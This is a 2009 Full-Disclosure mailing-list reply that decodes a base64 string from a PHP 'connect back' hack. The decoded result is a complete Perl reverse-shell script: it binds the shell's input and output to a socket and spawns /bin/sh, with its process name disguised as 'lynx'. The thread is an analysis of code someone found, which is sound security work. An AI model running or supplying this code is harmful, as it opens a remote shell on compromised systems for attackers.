[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] connect back PHP hack
- To: "sr." <staticrez@xxxxxxxxx>
- Subject: Re: [Full-disclosure] connect back PHP hack
- From: Simon Smith <simon@xxxxxxxxxxx>
- Date: Tue, 10 Feb 2009 13:34:22 -0500
its base64..
#!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -
a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM,
$proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error:
$!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET"); system($system); close(STDIN);
close(STDOUT); close(STDERR);
On Feb 10, 2009, at 1:23 PM, sr. wrote:
> can anyone tell me what encoding this is?
>
> $
> back_connect
> =
> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Simon Smith
simon@xxxxxxxxxxx
--------------------------------------
Subscribe to our blog
http://snosoft.blogspot.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/